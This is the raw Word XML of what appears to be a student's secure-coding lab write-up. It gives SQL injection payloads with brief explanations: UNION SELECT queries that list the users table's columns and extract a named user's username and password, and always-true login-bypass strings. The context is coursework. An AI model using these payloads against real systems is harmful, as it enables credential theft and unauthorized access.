        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76A529CF" wp14:editId="03506BCB">
            <wp:extent cx="5731510" cy="3254375"/>
            <wp:effectExtent l="0" t="0" r="254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0502" w14:textId="77777777" w:rsidR="00044960" w:rsidRDefault="00044960" w:rsidP="00044960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a' UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t>1,column</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">_name,3 FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t>='users' OFFSET 6;--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDBD523" w14:textId="099C6444" w:rsidR="00044960" w:rsidRDefault="00044960" w:rsidP="0032707A">
      <w:r>
        <w:t xml:space="preserve">This will list out all columns in the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> table. Need to use offset to show the columns for usernames, passwords and first name which can help me find Eric’s account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBF2EBD" w14:textId="238E74E6" w:rsidR="00044960" w:rsidRDefault="00044960" w:rsidP="0032707A">
      <w:r w:rsidRPr="00044960">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47382F8A" wp14:editId="6180C18F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3381" w14:textId="513CE001" w:rsidR="00044960" w:rsidRPr="00044960" w:rsidRDefault="00044960" w:rsidP="0032707A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a' UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t>1,username</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">,password FROM users WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t>firstname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t>='Eric';--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B276F40" w14:textId="5A1F2ED0" w:rsidR="00044960" w:rsidRDefault="00044960" w:rsidP="0032707A">
      <w:r>
        <w:t xml:space="preserve">By using union select the two different columns combine and this shows me only the username and password table. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7953D9AB" w14:textId="20D27BD8" w:rsidR="00044960" w:rsidRDefault="00044960" w:rsidP="0032707A"/>
    <w:p w14:paraId="45E5D7B9" w14:textId="28937FF7" w:rsidR="00044960" w:rsidRDefault="00044960" w:rsidP="0032707A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00044960">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SQLi basics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6965E1" w14:textId="77777777" w:rsidR="0080315D" w:rsidRDefault="0080315D" w:rsidP="0080315D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' or 1-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t>1;-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA0DC1E" w14:textId="12E6DC91" w:rsidR="00044960" w:rsidRDefault="0080315D" w:rsidP="0032707A">
      <w:r>
        <w:t>Since this means true, the backend will think the password we entered is correct.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA85CC6" w14:textId="62733010" w:rsidR="0080315D" w:rsidRDefault="0080315D" w:rsidP="0032707A">
      <w:r w:rsidRPr="0080315D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51D37682" wp14:editId="773FB798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ABD" w14:textId="33EAEB58" w:rsidR="0080315D" w:rsidRDefault="0080315D" w:rsidP="0032707A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0080315D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQLi Basics Two</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565352A1" w14:textId="349319B7" w:rsidR="0080315D" w:rsidRDefault="0080315D" w:rsidP="0032707A">
      <w:r w:rsidRPr="0080315D">
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0080315D">
        <w:t>or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0080315D">
        <w:t xml:space="preserve"> 1 = 1 or substring(password,1,1) = 'a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214EF6C1" w14:textId="77777777" w:rsidR="002B3B9E" w:rsidRDefault="002B3B9E" w:rsidP="002B3B9E">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> this would look like SELECT … WHERE username = ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="002B3B9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>' or 1 = 1 or substring(password,1,1) = 'a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3C0CEB" w14:textId="6D5D1411" w:rsidR="002B3B9E" w:rsidRDefault="002B3B9E" w:rsidP="0032707A">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>‘ and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> password = ‘ ‘ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56841FB9" w14:textId="31FD77EB" w:rsidR="002B3B9E" w:rsidRDefault="002B3B9E" w:rsidP="0032707A">
      <w:r>
        <w:t>Since true or false = true, the backend will think our password is correct.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EE2D7D" w14:textId="6BCC8A03" w:rsidR="002B3B9E" w:rsidRPr="0080315D" w:rsidRDefault="002B3B9E" w:rsidP="0032707A">
      <w:r w:rsidRPr="002B3B9E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20D792AC" wp14:editId="5B71CFAE">
            <wp:extent cx="5350933" cy="2990262"/>
            <wp:effectExtent l="0" t="0" r="254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797" cy="29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B9E" w:rsidRPr="0080315D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A3643" w14:textId="77777777" w:rsidR="009F67DC" w:rsidRDefault="009F67DC" w:rsidP="002C31D8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0513B31F" w14:textId="77777777" w:rsidR="009F67DC" w:rsidRDefault="009F67DC" w:rsidP="002C3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0B8A7" w14:textId="77777777" w:rsidR="002C31D8" w:rsidRPr="002C31D8" w:rsidRDefault="002C31D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16"/>
        <w:szCs w:val="24"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="002C31D8">
      <w:rPr>
        <w:color w:val="8496B0" w:themeColor="text2" w:themeTint="99"/>
        <w:spacing w:val="60"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:t>Page</w:t>
    </w:r>
    <w:r w:rsidRPr="002C31D8">
      <w:rPr>
        <w:color w:val="8496B0" w:themeColor="text2" w:themeTint="99"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidRPr="002C31D8">
      <w:rPr>
        <w:color w:val="323E4F" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="002C31D8">
      <w:rPr>
        <w:color w:val="323E4F" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r w:rsidRPr="002C31D8">
      <w:rPr>
        <w:color w:val="323E4F" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="008D7F4E">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="323E4F" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r w:rsidRPr="002C31D8">
      <w:rPr>
        <w:color w:val="323E4F" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidRPr="002C31D8">
      <w:rPr>
        <w:color w:val="323E4F" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:t xml:space="preserve"> | </w:t>
    </w:r>
    <w:r w:rsidRPr="002C31D8">
      <w:rPr>
        <w:color w:val="323E4F" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="002C31D8">
      <w:rPr>
        <w:color w:val="323E4F" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> NUMPAGES  \* Arabic  \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r w:rsidRPr="002C31D8">
      <w:rPr>
        <w:color w:val="323E4F" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="008D7F4E">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="323E4F" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r w:rsidRPr="002C31D8">
      <w:rPr>
        <w:color w:val="323E4F" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="7758E4C9" w14:textId="77777777" w:rsidR="002C31D8" w:rsidRDefault="002C31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E3D93" w14:textId="77777777" w:rsidR="009F67DC" w:rsidRDefault="009F67DC" w:rsidP="002C31D8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0AEFD810" w14:textId="77777777" w:rsidR="009F67DC" w:rsidRDefault="009F67DC" w:rsidP="002C3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D86DC" w14:textId="77777777" w:rsidR="002C31D8" w:rsidRDefault="002C31D8" w:rsidP="002C31D8">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="16"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00F01EE3">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>SECURITY CLASSIFICATION: Official (CLOSED), NON-SENSITIVE</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="440B82C2" w14:textId="77777777" w:rsidR="002C31D8" w:rsidRPr="00F01EE3" w:rsidRDefault="002C31D8" w:rsidP="002C31D8">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:sz w:val="10"/>
        <w:szCs w:val="16"/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="08A42858" w14:textId="77777777" w:rsidR="002C31D8" w:rsidRPr="00834DBA" w:rsidRDefault="002C31D8" w:rsidP="002C31D8">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:rPr>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>School of Computing</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:tab/>
      <w:t>ST2515-Secure Coding</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="1CAC5F9C" w14:textId="77777777" w:rsidR="002C31D8" w:rsidRDefault="002C31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D5913"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3C64186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81AF8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9F3659F4"/>
    <w:lvl w:ilvl="0" w:tplc="92C29E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578D7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="18944BA0"/>
    <w:lvl w:ilvl="0" w:tplc="43C2F6B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16"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="E2D6BFB4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B980EABC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%3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2F4BC0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="530ECDF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B7787"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E16CA8A2"/>
    <w:lvl w:ilvl="0" w:tplc="DDB06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57810"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BB202C8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2471A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AF2A65E4"/>
    <w:lvl w:ilvl="0" w:tplc="DDB06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C34568"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D090D1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012338">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2005626908">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2115779736">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="321474244">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="28265788">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="54133594">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1399475388">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="18742707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D42"/>
    <w:rsid w:val="000204AD"/>
    <w:rsid w:val="00031086"/>
    <w:rsid w:val="000323AA"/>
    <w:rsid w:val="00044960"/>
    <w:rsid w:val="0005232E"/>
    <w:rsid w:val="000567C4"/>
    <w:rsid w:val="00064EED"/>
    <w:rsid w:val="000674D0"/>
    <w:rsid w:val="0007004C"/>
    <w:rsid w:val="00075B3D"/>
    <w:rsid w:val="000B218F"/>
    <w:rsid w:val="000C4F74"/>
    <w:rsid w:val="00103B31"/>
    <w:rsid w:val="0011583F"/>
    <w:rsid w:val="00120E4C"/>
    <w:rsid w:val="00132B72"/>
    <w:rsid w:val="00132CA8"/>
    <w:rsid w:val="00133E96"/>
    <w:rsid w:val="00145103"/>
    <w:rsid w:val="00152157"/>
    <w:rsid w:val="00157E7D"/>
    <w:rsid w:val="001C30B4"/>
    <w:rsid w:val="001D0CE3"/>
    <w:rsid w:val="001F268C"/>
    <w:rsid w:val="00213797"/>
    <w:rsid w:val="002337D4"/>
    <w:rsid w:val="0023534B"/>
    <w:rsid w:val="002517A9"/>
    <w:rsid w:val="00251F14"/>
    <w:rsid w:val="00274401"/>
    <w:rsid w:val="0028616A"/>
    <w:rsid w:val="002A0B72"/>
    <w:rsid w:val="002A42A1"/>
    <w:rsid w:val="002B3B9E"/>
    <w:rsid w:val="002B6695"/>
    <w:rsid w:val="002C26AF"/>
    <w:rsid w:val="002C31D8"/>
    <w:rsid w:val="002D0160"/>
    <w:rsid w:val="002D5B45"/>
    <w:rsid w:val="002F6FBA"/>
    <w:rsid w:val="00306837"/>
    <w:rsid w:val="003163A3"/>
    <w:rsid w:val="00323BE2"/>
    <w:rsid w:val="00325785"/>
    <w:rsid w:val="0032707A"/>
    <w:rsid w:val="00356CC6"/>
    <w:rsid w:val="00374143"/>
    <w:rsid w:val="00396F22"/>
    <w:rsid w:val="003A215D"/>
    <w:rsid w:val="003C01A9"/>
    <w:rsid w:val="003D062E"/>
    <w:rsid w:val="003E3AB7"/>
    <w:rsid w:val="003E626A"/>
    <w:rsid w:val="003F071C"/>
    <w:rsid w:val="003F16EC"/>
    <w:rsid w:val="0043143C"/>
    <w:rsid w:val="0043617B"/>
    <w:rsid w:val="004404BB"/>
    <w:rsid w:val="0045456A"/>
    <w:rsid w:val="00465717"/>
    <w:rsid w:val="00482EAC"/>
    <w:rsid w:val="004B48D4"/>
    <w:rsid w:val="004C180C"/>
    <w:rsid w:val="004C6129"/>
    <w:rsid w:val="004D32A1"/>
    <w:rsid w:val="004E2FB6"/>
    <w:rsid w:val="00517C87"/>
    <w:rsid w:val="00547962"/>
    <w:rsid w:val="005666B8"/>
    <w:rsid w:val="005B5173"/>
    <w:rsid w:val="005D689A"/>
    <w:rsid w:val="005E1C0E"/>
    <w:rsid w:val="005F1A5B"/>
    <w:rsid w:val="00602558"/>
    <w:rsid w:val="00605007"/>
    <w:rsid w:val="006052FD"/>
    <w:rsid w:val="00613FE0"/>
    <w:rsid w:val="00616AAD"/>
    <w:rsid w:val="0066585F"/>
    <w:rsid w:val="00673CAB"/>
    <w:rsid w:val="006824BA"/>
    <w:rsid w:val="00685290"/>
    <w:rsid w:val="006912C9"/>
    <w:rsid w:val="006D1E40"/>
    <w:rsid w:val="006E2E4B"/>
    <w:rsid w:val="006F28BD"/>
    <w:rsid w:val="007073B0"/>
    <w:rsid w:val="00716778"/>
    <w:rsid w:val="00750EC3"/>
    <w:rsid w:val="00776286"/>
    <w:rsid w:val="00776BE4"/>
    <w:rsid w:val="0078693B"/>
    <w:rsid w:val="007A11A8"/>
    <w:rsid w:val="007E1B09"/>
    <w:rsid w:val="007E63A1"/>
    <w:rsid w:val="0080315D"/>
    <w:rsid w:val="00812F25"/>
    <w:rsid w:val="0082784F"/>
    <w:rsid w:val="00832FFA"/>
    <w:rsid w:val="00866B97"/>
    <w:rsid w:val="008726E4"/>
    <w:rsid w:val="008962EE"/>
    <w:rsid w:val="008A7DC4"/>
    <w:rsid w:val="008C2329"/>
    <w:rsid w:val="008D1B7E"/>
    <w:rsid w:val="008D5D42"/>
    <w:rsid w:val="008D7F4E"/>
    <w:rsid w:val="008E6409"/>
    <w:rsid w:val="00906AC2"/>
    <w:rsid w:val="00927FB8"/>
    <w:rsid w:val="009619A0"/>
    <w:rsid w:val="009802CF"/>
    <w:rsid w:val="00995A07"/>
    <w:rsid w:val="009B7426"/>
    <w:rsid w:val="009F67DC"/>
    <w:rsid w:val="00A04826"/>
    <w:rsid w:val="00A419FA"/>
    <w:rsid w:val="00A52AF8"/>
    <w:rsid w:val="00A53F49"/>
    <w:rsid w:val="00A621D9"/>
    <w:rsid w:val="00A671F8"/>
    <w:rsid w:val="00A93A12"/>
    <w:rsid w:val="00AD08F0"/>
    <w:rsid w:val="00AD4486"/>
    <w:rsid w:val="00B55A4B"/>
    <w:rsid w:val="00B64524"/>
    <w:rsid w:val="00B73437"/>
    <w:rsid w:val="00B95057"/>
    <w:rsid w:val="00BA0A81"/>
    <w:rsid w:val="00BA13CA"/>
    <w:rsid w:val="00C03DC5"/>
    <w:rsid w:val="00C13E2B"/>
    <w:rsid w:val="00C2294C"/>
    <w:rsid w:val="00C922A3"/>
    <w:rsid w:val="00CA0ACD"/>
    <w:rsid w:val="00CB46C3"/>
    <w:rsid w:val="00CC5E8E"/>
    <w:rsid w:val="00CD325B"/>
    <w:rsid w:val="00CF5D7D"/>
    <w:rsid w:val="00D037F6"/>
    <w:rsid w:val="00D348E4"/>
    <w:rsid w:val="00D52328"/>
    <w:rsid w:val="00D660ED"/>
    <w:rsid w:val="00D72B39"/>
    <w:rsid w:val="00D9086E"/>
    <w:rsid w:val="00D97DB0"/>
    <w:rsid w:val="00DA6784"/>
    <w:rsid w:val="00DB00F4"/>
    <w:rsid w:val="00DF25DA"/>
    <w:rsid w:val="00DF66E1"/>
    <w:rsid w:val="00E07821"/>
    <w:rsid w:val="00E4357D"/>
    <w:rsid w:val="00E969B4"/>
    <w:rsid w:val="00EA7FD1"/>
    <w:rsid w:val="00EF483F"/>
    <w:rsid w:val="00F1124C"/>
    <w:rsid w:val="00F17E6F"/>
    <w:rsid w:val="00F2007B"/>
    <w:rsid w:val="00F35900"/>
    <w:rsid w:val="00F71C51"/>
    <w:rsid w:val="00F801FE"/>
    <w:rsid w:val="00FE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F7C35"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0EBAC0D4-03B0-48D0-B4B5-3D400C80E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D42"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading9Char"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002337D4"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="SimSun" w:hAnsi="Cambria" w:cs="Times New Roman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5D4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007B"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00F20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9Char">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading9"/>
    <w:semiHidden/>
    <w:rsid w:val="002337D4"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="SimSun" w:hAnsi="Cambria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C3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D8"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002C3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4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49F10E902964387F3FC0FAFDD3733" ma:contentTypeVersion="0" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="dee792904ed33d6c837768be76e82a6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5977BC-DD6F-4877-BFC9-AE9C5AB192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739B36-97E2-41BB-B284-77F3B7B6BD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86692F-4A45-4C68-BA3C-E504DE5198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1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 Jin Kiat</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>MEGAN KOO JING YING</cp:lastModifiedBy>
  <cp:revision>12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-04-07T07:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-02T09:52:00Z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0x010100C8949F10E902964387F3FC0FAFDD3733</vt:lpwstr>
  </property>
</Properties>
</file>